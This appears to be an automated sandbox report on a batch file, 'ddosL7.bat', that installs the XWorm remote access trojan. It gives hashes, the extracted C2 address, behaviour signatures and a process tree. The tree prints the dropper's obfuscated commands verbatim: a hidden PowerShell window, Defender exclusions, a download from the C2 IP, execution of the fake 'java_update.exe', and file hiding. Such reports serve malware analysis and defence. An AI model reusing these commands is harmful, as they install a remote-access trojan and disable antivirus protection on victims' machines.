Analysis

  • max time kernel
    594s
  • max time network
    600s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-06-2024 13:58

General

  • Target

    ddosL7.bat

  • Size

    14KB

  • MD5

    cf5eda10b8afb767c9aa90c2e60da074

  • SHA1

    be2394dc599ca6d30b910bc96acbf5d83c09aee7

  • SHA256

    35024af1d65a1a627714e6ead42382b5952f97fef015f16634a2ca4c80e58438

  • SHA512

    83a6f144def80543ca523bbf0574d6e133773591b83f9ddf618f29742c92cc200a959db0e9d056ec871ee776aa9c7a0fe0294f366f65465148185e619e861faf

  • SSDEEP

    96:ygDHeGfNhaenzfUP+FdRdIYAsPbPFfIYAuP1D5e1dIYAW7:PrxfnduP

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.141.26.232:6666

Mutex

omb7mZjvAq0auoSy

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Java Update Checker (64 bit).exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ddosL7.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -wi"n"dow hi"d"den -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -co"m"mand "Add-MpPref"e"rence -Exclu"s"ionPath "C:\"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3240
    • C:\Windows\system32\attrib.exe
      attrib +h "Anon" /s /d
      2⤵
      • Views/modifies file attributes
      PID:3856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powers"h"ell -Comma"n"d "Invoke-Webr"e"quest 'http://45.141.26.232/java_update.exe' -OutFile java_update.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4648
    • C:\Users\Admin\AppData\Local\Temp\java_update.exe
      java_update.exe
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\java_update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java_update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1052
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\YOKI CG\AppD"a"ta\Lo"c"al\Anon\java_update.exe /s /d
      2⤵
      • Views/modifies file attributes
      PID:4000
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3988,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=1424 /prefetch:8
    1⤵
      PID:2268
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4892,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=1428 /prefetch:8
      1⤵
        PID:3304

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        3ca1082427d7b2cd417d7c0b7fd95e4e

        SHA1

        b0482ff5b58ffff4f5242d77330b064190f269d3

        SHA256

        31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

        SHA512

        bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        96ff1ee586a153b4e7ce8661cabc0442

        SHA1

        140d4ff1840cb40601489f3826954386af612136

        SHA256

        0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

        SHA512

        3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        d2e6a56cdbc1777635f55ad1ed9d4b9d

        SHA1

        ba66d2efd1f2b9acb35990e75be21196d56f70d5

        SHA256

        407baadcf10890ae75e96586ad08b4f9f4d9a44e0a8bef06a969ee6297aa24b5

        SHA512

        368f2d1a4cb5ff1841f1ae2857837f5aabd451f395e286362d8f0e4a1cc4b99192075c359b77816d57d31614bb1adcd6436c7cf5414a7de95b566143dd271603

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        4cb59d549e8c5d613ea4b7524088528a

        SHA1

        5bdfb9bc4920177a9e5d4b9c93df65383353ab22

        SHA256

        a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a

        SHA512

        a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        b1a1d8b05525b7b0c5babfd80488c1f2

        SHA1

        c85bbd6b7d0143676916c20fd52720499c2bb5c6

        SHA256

        adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

        SHA512

        346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        fd98baf5a9c30d41317663898985593b

        SHA1

        ea300b99f723d2429d75a6c40e0838bf60f17aad

        SHA256

        9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

        SHA512

        bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eq0fxqln.kbv.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\java_update.exe

        Filesize

        43KB

        MD5

        f3b2776ee93cfcaafc72385378a22b31

        SHA1

        59bc68bbe3ed4936c1747b0762156d6053947562

        SHA256

        087f7d0bf82588ecf5fa53545f7dd03cd72f3d4e729da7fd9490488ba4d42ab7

        SHA512

        68d273eb968df3bd6f9a8740eaab5379b0d40c0bbac60dc809568f57844d0f8b2fc815535af5736b242dfef3fcda8203bb990e85311c3c46243f0c6b1934ad0d

      • memory/1592-0-0x00007FFCC2FB3000-0x00007FFCC2FB5000-memory.dmp

        Filesize

        8KB

      • memory/1592-6-0x00000258F4A90000-0x00000258F4AB2000-memory.dmp

        Filesize

        136KB

      • memory/1592-15-0x00007FFCC2FB0000-0x00007FFCC3A71000-memory.dmp

        Filesize

        10.8MB

      • memory/1592-12-0x00007FFCC2FB0000-0x00007FFCC3A71000-memory.dmp

        Filesize

        10.8MB

      • memory/1592-11-0x00007FFCC2FB0000-0x00007FFCC3A71000-memory.dmp

        Filesize

        10.8MB

      • memory/3208-48-0x00000000007E0000-0x00000000007F0000-memory.dmp

        Filesize

        64KB

      • memory/3208-97-0x0000000002960000-0x000000000296C000-memory.dmp

        Filesize

        48KB

      • memory/3208-99-0x000000001BE90000-0x000000001BF40000-memory.dmp

        Filesize

        704KB

      • memory/3208-100-0x000000001F590000-0x000000001FAB8000-memory.dmp

        Filesize

        5.2MB

      • memory/3208-101-0x000000001BF50000-0x000000001BF5C000-memory.dmp

        Filesize

        48KB

      • memory/3240-32-0x00007FFCC2FB0000-0x00007FFCC3A71000-memory.dmp

        Filesize

        10.8MB

      • memory/3240-29-0x00007FFCC2FB0000-0x00007FFCC3A71000-memory.dmp

        Filesize

        10.8MB

      • memory/3240-27-0x00007FFCC2FB0000-0x00007FFCC3A71000-memory.dmp

        Filesize

        10.8MB

      • memory/3240-31-0x00007FFCC2FB0000-0x00007FFCC3A71000-memory.dmp

        Filesize

        10.8MB

      • memory/3240-17-0x00007FFCC2FB0000-0x00007FFCC3A71000-memory.dmp

        Filesize

        10.8MB